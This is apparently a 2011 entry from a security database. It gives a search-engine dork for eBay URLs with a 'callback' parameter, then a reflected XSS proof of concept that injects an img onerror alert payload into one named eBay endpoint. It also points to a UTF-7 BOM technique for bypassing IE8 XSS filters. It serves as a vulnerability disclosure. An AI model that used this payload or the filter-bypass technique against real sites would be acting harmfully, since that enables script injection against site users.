site:ebay.com inurl:callback

• SHDB
• 1771 阅读

• 日期：2011-02-11
• 类别：
  • Advisories and Vulnerabilities
• 作者：anonymous
• 语法：site:ebay.com inurl:callback

• Returns:

  http://sea.ebay.com/jplocal/campany/getcampnum.php?callback=?

  then:

  http://sea.ebay.com/jplocal/campany/getcampnum.php?callback=?xxxx%3Cimg%20src=1%20onerror=alert(1)%3E

  Can also use: http://seclists.org/fulldisclosure/2011/Feb/199 XSS through UTF7-BOM string injection to bypass IE8 XSS Filters